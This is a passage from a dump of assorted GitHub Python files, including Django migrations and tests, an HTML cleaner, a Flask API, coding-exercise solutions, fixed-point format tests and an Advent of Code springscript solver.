ext_dir+ext_dict[handle]\n    # through files\n    ext_dict = get_ext_master_dic(os.path.join(ext_dir,masterfn))\n    return os.path.join(ext_dir,ext_dict[handle])","repo_name":"gwallison/openFF","sub_path":"common/file_handlers.py","file_name":"file_handlers.py","file_ext":"py","file_size_in_byte":5071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"26147514235","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.db.models.deletion\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='CourseTalkWidgetConfiguration',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),\n                ('enabled', models.BooleanField(default=False, verbose_name='Enabled')),\n                ('platform_key', models.CharField(help_text=\"This key needs to associate CourseTalk reviews with your platform. 
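# A minimal sketch of the download-once caching pattern used by
# get_df_from_url above (names are invented; stdlib only):
import os
import urllib.request

def fetch_once_demo(url, fn):
    if not os.path.isfile(fn):        # only hit the network when no local copy
        urllib.request.urlretrieve(url, fn)
    return fn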
Better to use domain name Ex: for 'http://edx.org' platform_key will be 'edx'\", max_length=50)),\n ('changed_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='Changed by')),\n ],\n options={\n 'ordering': ('-change_date',),\n 'abstract': False,\n },\n ),\n ]\n","repo_name":"analyseuc3m/ANALYSE-v1","sub_path":"openedx/core/djangoapps/coursetalk/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1292,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"73655954727","text":"from bs4 import BeautifulSoup, Tag, NavigableString\n\n\ndef has_subsection_style(tag):\n if tag.has_attr('style'):\n if 'overflow:hidden' in tag['style'] and 'width:635px' in tag['style']:\n return True\n return False\n\n\ndef has_article_style(tag):\n if tag.has_attr('style'):\n if 'font-size:12.0pt' in tag['style'] and 'font-weight:bold' in tag['style'] and 'text-decoration:underline' in tag['style']:\n return True\n return False\n\n\ndef cleanse(infile_name: str,\n outfile_name: str,\n theme: str = \"default\"):\n with open(infile_name, \"r\") as file:\n content = file.read()\n soup = BeautifulSoup(content, 'html.parser')\n\n for tag in soup.find_all():\n content = tag.string\n if content is not None:\n content = content.strip()\n if content == '':\n tag.extract()\n\n for tag in soup.find_all(True, {'class': True}):\n if tag.name == \"table\" and tag.get('border') == '1':\n continue\n del tag['class']\n del tag['cellpadding']\n del tag['cellspacing']\n\n for tag in soup.find_all(True, {'bgcolor': True}):\n del tag['bgcolor']\n\n for tag in soup.find_all(True, {'valign': True}):\n del tag['valign']\n\n tags_with_target_style = soup.find_all(has_subsection_style)\n for i, tag in enumerate(tags_with_target_style, start=1):\n parent = tag.find_parent().find_parent()\n new_div = soup.new_tag('div')\n new_div['class'] = 'subsection'\n parent.replace_with(new_div)\n new_div.append(parent)\n\n for div in soup.find_all('div', {'class': 'subsection'}):\n div.parent.unwrap()\n\n subsections = soup.find_all('div', {'class': 'subsection'})\n for index, subsection in enumerate(subsections):\n elems = []\n next_subsection = subsections[index + 1] if index + 1 < len(subsections) else None\n\n for sibling in list(subsection.next_siblings):\n if sibling is next_subsection:\n break\n if isinstance(sibling, NavigableString):\n continue\n elems.append(sibling.extract())\n\n new_div = soup.new_tag('div')\n new_div['class'] = 'section'\n new_div.append(subsection.extract())\n\n for e in elems:\n new_div.append(e)\n\n soup.append(new_div)\n\n tags_with_article_style = soup.find_all(has_article_style)\n for article in tags_with_article_style:\n if article.parent is not None and article.parent.parent is not None:\n article.parent.unwrap()\n\n for section in soup.find_all('div', {'class': 'section'}):\n articles = section.find_all(has_article_style)\n for index, article in enumerate(articles):\n elems = []\n next_article = articles[index + 1] if index + 1 < len(articles) else None\n for sibling in list(article.next_siblings):\n if next_article is not None and sibling in next_article:\n break\n if isinstance(sibling, NavigableString):\n continue\n elems.append(sibling.extract())\n\n # Create new div and append all extracted elements to it\n new_div = soup.new_tag('div') # Create a new div tag\n new_div['class'] = 'article'\n 
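# Standalone illustration of the extract()/append() re-parenting used in this
# loop (the markup below is invented):
from bs4 import BeautifulSoup

demo = BeautifulSoup('<p>one</p><p>two</p>', 'html.parser')
box = demo.new_tag('div')
box['class'] = 'article'
first = demo.find('p')
box.append(first.extract())   # extract() detaches the node, append() re-parents it
demo.append(box)
assert str(demo) == '<p>two</p><div class="article"><p>one</p></div>'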
new_div.append(article.extract())\n\n for e in elems:\n new_div.append(e)\n\n section.append(new_div)\n\n for tag in soup.find_all(True, {'style': True}):\n del tag['style']\n\n for tag in soup.find_all('table'):\n tag['border'] = '1'\n\n for tag in soup.find_all('div', {'class': 'article'}):\n span = tag.find('span')\n if span is not None:\n span['style'] = 'font-weight:bold'\n\n soup.find('div').unwrap()\n\n for p in soup.find_all('p'):\n if len(p.contents) == 0:\n p.extract()\n\n for p in soup.find_all('p'):\n if len(p.contents) == 1:\n p.replace_with(p.contents[0])\n\n try:\n with open(outfile_name, \"w\") as file:\n # file.write(soup.prettify().encode('euc-kr', 'ignore').decode('utf-8'))\n file.write(soup.prettify())\n except:\n with open(outfile_name, \"w\") as file:\n file.write(soup.prettify().encode('utf-8', 'surrogatepass').decode('utf-8', 'replace'))\n\n\nif __name__ == \"__main__\":\n ...\n # ! issue (manual fix needed, list of issues below)\n # ! data/cleansed/기타지원.html ** issue\n # ! data/cleansed/임신보육지원.html ** issue\n # ! data/cleansed/청소년청년지원.html ** issue\n\n # cleanse(infile_name=\"data/section/기타지원.html\",\n # outfile_name=\"data/cleansed/기타지원.html\",)\n # cleanse(infile_name=\"data/section/노령층지원.html\",\n # outfile_name=\"data/cleansed/노령층지원.html\",)\n # cleanse(infile_name=\"data/section/법률금융복지지원.html\",\n # outfile_name=\"data/cleansed/법률금융복지지원.html\",)\n # cleanse(infile_name=\"data/section/보건의료지원.html\",\n # outfile_name=\"data/cleansed/보건의료지원.html\",)\n # cleanse(infile_name=\"data/section/보훈대상자지원.html\",\n # outfile_name=\"data/cleansed/보훈대상자지원.html\",)\n # cleanse(infile_name=\"data/section/생계지원.html\",\n # outfile_name=\"data/cleansed/생계지원.html\",)\n # cleanse(infile_name=\"data/section/장애인지원.html\",\n # outfile_name=\"data/cleansed/장애인지원.html\",)\n # cleanse(infile_name=\"data/section/청소년청년지원.html\",\n # outfile_name=\"data/cleansed/청소년청년지원.html\",)\n # cleanse(infile_name=\"data/section/취업지원.html\",\n # outfile_name=\"data/cleansed/취업지원.html\",)\n # cleanse(infile_name=\"data/section/임신보육지원.html\",\n # outfile_name=\"data/cleansed/임신보육지원.html\",)\n","repo_name":"orange-fritters/ai-employee","sub_path":"preprocess/html_related/html_cleanser.py","file_name":"html_cleanser.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5881425457","text":"import sys\nfrom source import scraper\n# sys.path.append('source/')\n# import scraper\n\nweedmaps_json_site = \"https://api-g.weedmaps.com/discovery/v1/listings?filter%5Bbounding_box%5D=33.77115672832914%2C-119.14947509765626%2C34.16977214177208%2C-117.39166259765626&page_size=100&page=1\"\nsource = \"Weedmaps\"\n\nweedmap = scraper.scraper(weedmaps_json_site, source)\nweedmap.parse()\nweedmap.output(\"test\")\n\nprint(\"All Done\")","repo_name":"karlhickel/weedmaps_scraper","sub_path":"my_scrape.py","file_name":"my_scrape.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19527437574","text":"\"\"\"\nThis module runs a server with REST API and responses with the saved data from the provided DB.\n\"\"\"\n\nfrom flask import Flask, jsonify, send_file\nfrom brainstreamer.platforms.databases import DBWrapper\n\nserv = Flask(__name__)\ndb = None\n\n\n# Run the server on the given address using the provided DB\ndef run_api_server(host, port, database_url):\n global db\n db = DBWrapper(database_url)\n serv.run(host, 
int(port))\n\n\n# Wraps the response with json format and adds a header to it\ndef _wrap_response(data):\n    response = jsonify(data)\n    response.headers.add('Access-Control-Allow-Origin', '*')\n    return response\n\n\n@serv.route('/users', methods=['GET'])\ndef get_users():\n    users = db.get_users()\n    users = [{'user_id': user['user_id'], 'username': user['username']} for user in users]\n    return _wrap_response(users)\n\n\n@serv.route('/users/<user_id>')\ndef get_user_by_id(user_id):\n    user = db.get_user_by_id(user_id)\n    return _wrap_response(user)\n\n\n@serv.route('/users/<user_id>/snapshots')\ndef get_snapshots_by_user_id(user_id):\n    snapshots = db.get_snapshots_by_user_id(user_id)\n    snapshots = [{'snapshot_id': snapshot['snapshot_id'], 'datetime': snapshot['datetime']}\n                 for snapshot in snapshots]\n    return _wrap_response(snapshots)\n\n\n@serv.route('/users/<user_id>/snapshots/<snapshot_id>')\ndef get_snapshot_by_id(user_id, snapshot_id):\n    snapshot = db.get_snapshot_by_id(user_id, snapshot_id)\n    results = list(snapshot['results'].keys())\n    return _wrap_response(results)\n\n\n@serv.route('/users/<user_id>/snapshots/<snapshot_id>/<result_name>')\ndef get_snapshot_result(user_id, snapshot_id, result_name):\n    result = db.get_snapshot_by_id(user_id, snapshot_id)['results'][result_name]\n    return _wrap_response(result)\n\n\n@serv.route('/users/<user_id>/snapshots/<snapshot_id>/<result_name>/data')\ndef get_snapshot_result_data(user_id, snapshot_id, result_name):\n    path = db.get_snapshot_by_id(user_id, snapshot_id)['results'][result_name]['data_path']\n    return send_file(path)\n","repo_name":"AllenChikman/brainstreamer","sub_path":"brainstreamer/api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2049,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"16941465298","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by HazzaCheng on 2019-11-02\n\n\nclass Solution:\n    def numDistinct(self, s: str, t: str) -> int:\n        s_len, t_len = len(s), len(t)\n        dp = [1] * (s_len + 1)\n        prev = 1\n        dp[0] = 0\n\n        for i in range(1, t_len + 1):\n            for j in range(1, s_len + 1):\n                tmp = dp[j]\n                if s[j - 1] == t[i - 1]:\n                    dp[j] = dp[j - 1] + prev\n                else:\n                    dp[j] = dp[j - 1]\n                prev = tmp\n            prev = 0\n\n        return dp[s_len]\n\n","repo_name":"minhhahao/LeetCode","sub_path":"src/main/python/leetcode_by_python/dp/No115_Distinct_Subsequences.py","file_name":"No115_Distinct_Subsequences.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"36871287944","text":"import numpy as np\n\nlist1 = [1, 2, 3, 4]\na = np.array(list1)\nprint(a.shape)\n\nb = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])\nprint(b.shape)\n\na = np.zeros((2, 2))\nprint(a)\na = np.ones((2, 3))\nprint(a)\na = np.full((2, 3), 5)\nprint(a)\na = np.eye(3)\nprint(a)\na = np.array(range(20)).reshape((4, 5))\nprint(a)\narray1 = [\n    [1, 2, 3],\n    [4, 5, 6],\n    [7, 8, 9]\n]\narray1_re = np.array(array1)\na = np.array(range(10, 19)).reshape(array1_re.shape)\nprint(a)\n\nlst = [\n    [1, 2, 3],\n    [4, 5, 6],\n    [7, 8, 9]\n]\narr = np.array(lst)\n\n# slicing\na = arr[0:2, 0:2]\nprint(a)\na = arr[1:, 1:]\nprint(a)\n\nlst = [\n    [1, 2, 3, 4],\n    [5, 6, 7, 8],\n    [9, 10, 11, 12]\n]\na = np.array(lst)\ns = a[[0, 1], [1, 3]]\nprint(s)\n\n# writing s = a[[n1, n2], [n3, n4]]\n# does not select a[n1, n2] and a[n3, n4];\n# it selects a[n1, n3] and a[n2, n4].\n\n\n# boolean indexing\nlst = [\n    [1, 2, 3],\n    [4, 5, 6],\n    [7, 8, 9]\n]\na = np.array(lst)\n\nbool_indexing_array = np.array([\n    [False, True, False],\n    [True, False, True],\n    [False, True, 
False]\n])\n\nn = a[bool_indexing_array]\nprint(n)\n\nlst = [\n    [1, 2, 3],\n    [4, 5, 6],\n    [7, 8, 9]\n]\na = np.array(lst)\n\nbool_indexing = (a % 2 == 0)\n\nprint(bool_indexing)\nprint(a[bool_indexing])\nn = a[ a % 2 == 0]\nprint(n)\n\na = np.array([1, 2, 3])\nb = np.array([4, 5, 6])\n\nc = np.add(a, b)\nprint(c)\nc = a + b\nprint(c)\n\nc = np.subtract(a, b)\nprint(c)\nc = a - b\nprint(c)\n\nc = a * b\nprint(c)\nc = np.multiply(a, b)\nprint(c)\n\nc = a / b\nprint(c)\nc = np.divide(a, b)\nprint(c)","repo_name":"heat-of-fusion/test","sub_path":"personal/personal_study/numpy/04_20.py","file_name":"04_20.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39500423999","text":"from rest_framework import mixins, serializers, viewsets\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom ee.api.role import RolePermissions\nfrom ee.models.organization_resource_access import OrganizationResourceAccess\nfrom posthog.api.routing import StructuredViewSetMixin\nfrom posthog.permissions import OrganizationMemberPermissions\n\n\nclass OrganizationResourceAccessSerializer(serializers.ModelSerializer):\n    class Meta:\n        model = OrganizationResourceAccess\n        fields = [\n            \"id\",\n            \"resource\",\n            \"access_level\",\n            \"organization\",\n            \"created_at\",\n            \"updated_at\",\n            \"created_by\",\n        ]\n        read_only_fields = [\"id\", \"created_at\", \"created_by\", \"organization\"]\n\n    def validate_resource(self, resource):\n        if OrganizationResourceAccess.objects.filter(\n            organization=self.context[\"request\"].user.organization,\n            resource=resource,\n        ).exists():\n            raise serializers.ValidationError(\"This resource access already exists.\", code=\"unique\")\n        return resource\n\n    def create(self, validated_data):\n        validated_data[\"organization\"] = self.context[\"request\"].user.organization\n        return super().create(validated_data)\n\n\nclass OrganizationResourceAccessViewSet(\n    StructuredViewSetMixin,\n    mixins.ListModelMixin,\n    mixins.RetrieveModelMixin,\n    mixins.CreateModelMixin,\n    mixins.UpdateModelMixin,\n    mixins.DestroyModelMixin,\n    viewsets.GenericViewSet,\n):\n    permission_classes = [\n        IsAuthenticated,\n        OrganizationMemberPermissions,\n        RolePermissions,\n    ]\n    serializer_class = OrganizationResourceAccessSerializer\n    queryset = OrganizationResourceAccess.objects.all()\n","repo_name":"PostHog/posthog","sub_path":"ee/api/organization_resource_access.py","file_name":"organization_resource_access.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"}
{"seq_id":"12125829995","text":"Xv = list()\nYv = list()\n\nXv = input('Informe o vetor X: ')\nXsplit = Xv.split()\nX = [int(i) for i in Xsplit]\n\nYv = input('Informe o vetor Y:')\nYsplit = Yv.split()\nY = [int(i) for i in Ysplit]\n\npESCA = 0\npVet = list()\n\nfor i in range(3):\n    pESCA += X[i]*Y[i]\n\npVet.append(X[1]*Y[2] - X[2]*Y[1])\npVet.append(X[2]*Y[0] - X[0]*Y[2])\npVet.append(X[0]*Y[1] - X[1]*Y[0])\n\nprint(\"O produto ESCALAR é: %i\" %pESCA)\nprint(\"Vetor do produto VETORIAL: %s \"%pVet)\n\n","repo_name":"TheMarcelin/Python","sub_path":"Q7.4.py","file_name":"Q7.4.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74317297449","text":"# coding=utf8\r\n\r\n\"\"\"\r\nThis file contains tests for the FPF class and its methods\r\n\"\"\"\r\n\r\n\r\n__author__ = \"Thibault 
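# Cross-check of the j-component formula in the vector-product record above
# (editor's sketch; the vectors are invented):
import numpy as np
X_demo, Y_demo = [1, 2, 3], [4, 5, 6]
manual = [X_demo[1]*Y_demo[2] - X_demo[2]*Y_demo[1],
          X_demo[2]*Y_demo[0] - X_demo[0]*Y_demo[2],
          X_demo[0]*Y_demo[1] - X_demo[1]*Y_demo[0]]
assert manual == list(np.cross(X_demo, Y_demo))   # -> [-3, 6, -3]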
Hilaire, Benoit Lopez\"\n__copyright__ = \"Copyright 2015, FIPOgen Project, LIP6\"\n__credits__ = [\"Thibault Hilaire\", \"Benoit Lopez\"]\n\n__license__ = \"CECILL-C\"\n__version__ = \"0.4\"\n__maintainer__ = \"Thibault Hilaire\"\n__email__ = \"thibault.hilaire@lip6.fr\"\n__status__ = \"Beta\"\n\nimport pytest\nfrom fixif.FxP import FPF\nfrom random import randint, choice\nfrom pytest import mark\nfrom tempfile import NamedTemporaryFile, mkdtemp\nfrom subprocess import Popen, PIPE\n\n\n\ndef test_construct():\n\t\"\"\"Unit test for the FPF constructor\"\"\"\n\t# construct FPF with less than 2 args\n\twith pytest.raises(ValueError):\n\t\tFPF(16)\n\twith pytest.raises(ValueError):\n\t\tFPF(msb=12)\n\twith pytest.raises(ValueError):\n\t\tFPF(lsb=-6)\n\n\t# construct with wrong wl\n\twith pytest.raises(ValueError):\n\t\tFPF(wl=-12, msb=6)\n\twith pytest.raises(ValueError):\n\t\tFPF(wl=1, msb=6, signed=True)\n\n\n\t# construct FPF with only wl and (lsb or msb)\n\tf = FPF(16, lsb=-12)\n\tassert(f.wml() == (16, 3, -12))\n\tf = FPF(16, msb=3)\n\tassert(f.wml() == (16, 3, -12))\n\tf = FPF(16, msb=0)\n\tassert(f.wml() == (16, 0, -15))\n\twith pytest.raises(ValueError):\n\t\tFPF(16, 12, -5)\n\t\n\t# construct form string\n\tf = FPF(formatStr=\"Q8.12\")\n\tassert(f.wml() == (20, 7, -12))\n\tf = FPF(formatStr=\"sQ4.3\")\n\tassert(f.wml() == (7, 3, -3))\n\tf = FPF(formatStr=\"uQ4.3\")\n\tassert(f.wml() == (7, 3, -3))\n\tf = FPF(formatStr=\"(8,-12)\")\n\tassert(f.wml() == (21, 8, -12))\n\tf = FPF(formatStr=\"u(8,-12)\")\n\tassert(f.signed is False)\n\tassert(f.wml() == (21, 8, -12))\n\twith pytest.raises(ValueError):\n\t\tFPF(formatStr=\"totoQ6.8\")\n\t\t\n\tf = FPF(msb=7, lsb=0, signed=True)\n\tassert(f.minmax() == (-128, 127))\n\tf = FPF(msb=7, lsb=0, signed=False)\n\tassert(f.minmax() == (0, 255))\n\n\n# def test_shift():\n# \t\"\"\" Test the shifts\n# \t\"\"\"\n# \t# TODO: complete the tests\n# \tf = FPF(16, 3, -12)\n# \tf.shift(2)\n# \tassert(f.wml() == (16, 5, -10))\n\n\n\n\n# def test_approx():\n# \t\"\"\"Test the approx method\"\"\"\n# \t# TODO: do it over a large number of values\n# \tF = FPF(msb=7, lsb=0)\n# \tassert(F.approx(25) == 25)\n# \tassert(F.approx(25.001) == 25)\n# \tassert(F.approx(25.26789) == 25)\n\n\ndef iterSomeFPF(N):\n\tfor _ in range(N):\n\t\tw = randint(2,30)\n\t\tm = randint(-30,30)\n\t\ts = choice([True,False])\n\t\tyield FPF(wl=w, msb=m, signed=s)\n\n\n@mark.parametrize(\"fpf\", iterSomeFPF(100))\ndef test_LaTeX(fpf):\n\t\"\"\"Test the LaTeX (tikz) code for a FPF\"\"\"\n\t# randomly choose the parameter (do not want to exploit all the possibilities)\n\ty_origin = randint(-5,5)\n\tcolors = choice([None, ('red!40','blue!30','green!40'), ('black!60', 'black!30', 'white')])\n\tbinary_point = choice([True, False])\n\tlabel = choice( ['left', 'right', 'above', 'below', 'no'])\n\tnotation = choice([\"mlsb\", \"ifwl\"])\n\tnumeric = choice([True, False])\n\tintfrac = choice([True, False])\n\tpower2 = choice([True, False])\n\tdrawMissing = choice([True, False])\n\t# go to a temp directory\n\ttmp = mkdtemp()\n\t# create a temp file\n\twith NamedTemporaryFile(mode='w+', dir=tmp) as f:\n\t\t# write minimal LaTeX code in it\n\t\tlatex = fpf.LaTeX(y_origin=y_origin, colors=colors, binary_point=binary_point, label=label, notation=notation, numeric=numeric, intfrac=intfrac, power2=power2, 
drawMissing=drawMissing)\r\n\t\tf.write(\"\"\"\n\\\\documentclass[class=minimal,border=0mm]{standalone}\n\\\\usepackage{tikz}\n\\\\usetikzlibrary{backgrounds}\n\\\\usetikzlibrary{patterns}\n\\\\begin{document}\n\\\\begin{tikzpicture}[show background rectangle, background rectangle/.style={fill=white}]\n\t\\\\tikzstyle{fractional}=[fill=red!40]\n\t\\\\tikzstyle{integer}=[fill=blue!15]\n\t\\\\tikzstyle{sign}=[fill=purple!15]\n%s\n\\\\end{tikzpicture}\n\\\\end{document}\"\"\"%latex)\n\t\tf.flush()\n\t\t# run pdflatex on it\n\t\tproc = Popen( \"cd \" + tmp + \"&& pdflatex \"+ f.name, stdout=PIPE, stderr=PIPE, shell=True)\n\t\t# check if the output doesn't start with a '!' (a way to detect LaTeX error in the output of pdflatex)\n\t\tline='non-empty'\n\t\twhile line:\n\t\t\tline = proc.stdout.readline().decode('utf-8')\n\t\t\tassert(not line.startswith('!'))\n\n\t\t#TODO: do it with latex package (as it is done in fixif itself, see fixif.SIF.R_algorithm)\n\n\n\n@mark.parametrize(\"fpf\", iterSomeFPF(1000))\ndef test_notation(fpf):\n\tassert(FPF(formatStr=fpf.Qnotation()) == fpf)\n\tassert(FPF(formatStr=fpf.ParenthesisNotation()) == fpf)\n\tassert(FPF(formatStr=repr(fpf)) == fpf)\n\tstr(fpf)","repo_name":"fixif/FxP","sub_path":"fixif/FxP/test/test_FPF.py","file_name":"test_FPF.py","file_ext":"py","file_size_in_byte":4303,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"14742976678","text":"\"\"\"\npublic: Can be accessed from inside and outside the class\nprotected: Only from inside the class or from inside its child classes\nprivate: Only available inside the class\n\n# Python convention: if an attribute has one underscore before its name, accessing it is not recommended.\n_ works like protected/private: even written this way it is still possible to access and modify the variable. (public _)\n__ it is strongly recommended that such a variable never be accessed from outside (_CLASSNAME__attributename).\n\nThis serves to protect your application.\nExample:\n\"\"\"\n\n\nclass BaseDeDados:\n    def __init__(self):\n        self.__dados = {}  # two underscores are recommended so that the variable is not accessed.\n\n    def inserir_cliente(self, id, nome):\n        if 'clientes' not in self.__dados:\n            self.__dados['clientes'] = {id: nome}\n        else:\n            self.__dados['clientes'].update({id: nome})\n\n    def lista_clientes(self):\n        for id, nome in self.__dados['clientes'].items():\n            print(id, nome)\n\n    def apaga_cliente(self, id):\n        del self.__dados['clientes'][id]\n\n\nbd = BaseDeDados()\nbd.inserir_cliente(1, 'Elias')\nbd.inserir_cliente(2, 'Otavio')\nbd.inserir_cliente(3, 'Rose')\n\nbd.__dados = 'Uma outra coisa'  # When you access the variable this way, Python creates another one and does not change the one in the class.\n# To see the modified attribute:\nprint(bd.__dados)\nprint(bd._BaseDeDados__dados)\n\n","repo_name":"eliasantoniorodrigues1/POO_python","sub_path":"encapsulamento.py","file_name":"encapsulamento.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"23201708624","text":"if __name__ == '__main__':\n    n = int(input())\n    l = []\n    for _ in range(n):\n        s = input().split()\n        if(s[0]=='insert'):\n            a = int(s[1])\n            b = int(s[2])\n            l.insert(a, b)\n        elif(s[0]=='print'):\n            print(l)\n        elif(s[0]=='remove'):\n            a = int(s[1])\n            l.remove(a)\n        elif(s[0]=='append'):\n            a = int(s[1])\n            l.append(a)\n        elif(s[0]=='sort'):\n            l.sort()\n        elif(s[0]=='pop'):\n            l.pop()\n        elif(s[0]=='reverse'):\n            l.reverse()\n\n\"\"\"\nEditorial by DOSHI\nWe can solve this using list methods and conditionals.\n\nTested by DOSHI\nProblem Tester's code:\n\narr = []\nfor i in range(int(raw_input())):\n    s = raw_input().split()\n    for i in range(1,len(s)):\n        s[i] = int(s[i])\n    \n    if s[0] == \"append\":\n        arr.append(s[1])\n    elif s[0] == \"extend\": \n        arr.extend(s[1:])\n    elif s[0] == \"insert\":\n        arr.insert(s[1],s[2])\n    elif s[0] == \"remove\":\n        arr.remove(s[1])\n    elif s[0] == \"pop\":\n        arr.pop()\n    elif s[0] == \"index\":\n        print arr.index(s[1])\n    elif s[0] == \"count\":\n        print arr.count(s[1])\n    elif s[0] == \"sort\":\n        arr.sort()\n    elif s[0] == \"reverse\":\n        arr.reverse()\n    elif s[0] == \"print\":\n        print arr\n\"\"\"\n","repo_name":"laziestcoder/Python_HR_Codes","sub_path":"2 Basic Data Types/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
{"seq_id":"7014157449","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetuptools.setup(\n    name=\"logger\",\n    version=\"0.0.1\",\n    author=\"TFreitaz\",\n    author_email=\"thales.zfreitas@gmail.com\",\n    description=\"Easy creation and upload of full detailed logs.\",\n    long_description=long_description,\n    url=\"https://github.com/arocketman/git-and-pip\",\n    packages=setuptools.find_packages(),\n    install_requires=[\"cryptography==3.2.1\", \"elasticsearch==7.10.1\", \"python-dotenv==0.15.0\"],\n    classifiers=[\"Programming Language :: Python :: 3\", \"Operating System :: OS Independent\"],\n)\n","repo_name":"TFreitaz/logger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":608,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"12635816328","text":"from django.test 
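# Standalone illustration of the name mangling described in the encapsulation
# record above (class and attribute names here are invented):
class Box:
    def __init__(self):
        self.__secret = 42        # stored on the instance as _Box__secret

b = Box()
assert b._Box__secret == 42       # reachable, but the mangled name signals "hands off"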
import TestCase\nfrom .models import Picture,Comment,HashTag,Profile\nimport datetime as dt\n\n# Create your tests here.\nclass PictureTestClass(TestCase):\n def setUp(self):\n self.picture =Picture(title='image',caption='image description',published='11/2/2022',user=self.user)\n self.picture.save_picture()\n\n self.comment =Comment(published='11/2/2022',content='image description',user=self.user)\n\n self.profile =Profile(user='image',bio='image description')\n self.picture.save_picture()\n\n self.hashtag =HashTag(name='image')\n self.picture.save_picture()\n\n def tearDown(self):\n Picture.objects.all().delete()\n Profile.objects.all().delete()\n Comment.objects.all().delete()\n HashTag.objects.all().delete()\n \n def test_get_ipicture_id(self):\n picture=Picture.get_picture_by_id()\n self.assertTrue(len(picture)>0)\n\n def test_search_picture(self):\n term='school'\n results=Picture.search_picture(term)\n self.assertTrue(len(results)==0)","repo_name":"tori-bot/instagram-clone","sub_path":"insta_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"916998065","text":"\"\"\"\n--- Day 21: Springdroid Adventure ---\n\nhttps://adventofcode.com/2019/day/21\n\n\"\"\"\n\nimport re\n\nfrom _intcode_computer import IntcodeComputer\n\nTILE2DRAW = {\n 0: '#',\n 1: '.',\n 2: '~',\n -1: ' ',\n}\n\n\nclass NoSignal(Exception):\n pass\n\n\nclass IntcodeComputer21(IntcodeComputer):\n def _get_op3_input(self):\n if self.signals:\n return self.signals.pop(0)\n # return input('Enter instruction:\\n')\n self.gen = self._compute()\n raise NoSignal()\n\n\nclass SpringScript:\n _jump_size = 4\n _rexp = re.compile(r'(\\w+)\\s+(\\w)\\s(\\w)')\n\n def __init__(self, to_draw=False, extended_mode=False):\n self.to_draw = to_draw\n # Two registers are available: T, the temporary value register, and J, the jump register\n\n # Your springdroid can detect ground at four distances:\n # one tile away (A), two tiles away (B), three tiles away (C), and four tiles away (D).\n # If there is ground at the given distance, the register will be true; if there is a hole,\n # the register will be false\n self.registers = {\n 'T': False, # temporary value register\n 'J': False, # jump register\n 'A': False, # is there ground 1 tile away\n 'B': False, # is there ground 2 tiles away\n 'C': False, # is there ground 3 tiles away\n 'D': False, # is there ground 4 tiles away\n 'E': False,\n 'F': False,\n 'G': False,\n 'H': False,\n 'I': False,\n }\n\n self.computer = IntcodeComputer21()\n\n self.extended_mode = extended_mode\n\n @staticmethod\n def _check_is_writable(y):\n return y in ('T', 'J')\n\n def _and(self, x, y):\n self._check_is_writable(y)\n\n val = self.registers[x] and self.registers[y]\n self.registers[y] = val\n return val\n\n def _or(self, x, y):\n self._check_is_writable(y)\n\n val = self.registers[x] or self.registers[y]\n self.registers[y] = val\n return val\n\n def _not(self, x, y):\n self._check_is_writable(y)\n\n val = not self.registers[x]\n self.registers[y] = val\n return val\n\n @staticmethod\n def _get_string_in_ascii(s):\n return [ord(c) for c in s] + [10]\n\n def _test(self, program, test_map):\n for idx, reg in enumerate(\n ['A', 'B', 'C', 'D'] if not self.extended_mode\n else ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']\n ):\n v = test_map[idx]\n self.registers[reg] = v\n\n for line in program:\n if line in ('WALK', 'RUN'):\n break\n res = self._rexp.match(line)\n if not 
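# Hedged mini-trace of the three springscript operations modelled above
# (register values invented: hole one tile ahead, ground four tiles ahead):
regs = {'T': False, 'J': False, 'A': False, 'D': True}
regs['J'] = regs['D'] or regs['J']    # OR D J  -> J True (safe landing at D)
regs['T'] = not regs['A']             # NOT A T -> T True (hole at A)
regs['J'] = regs['T'] and regs['J']   # AND T J -> J stays True: jump
assert regs['J'] is True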
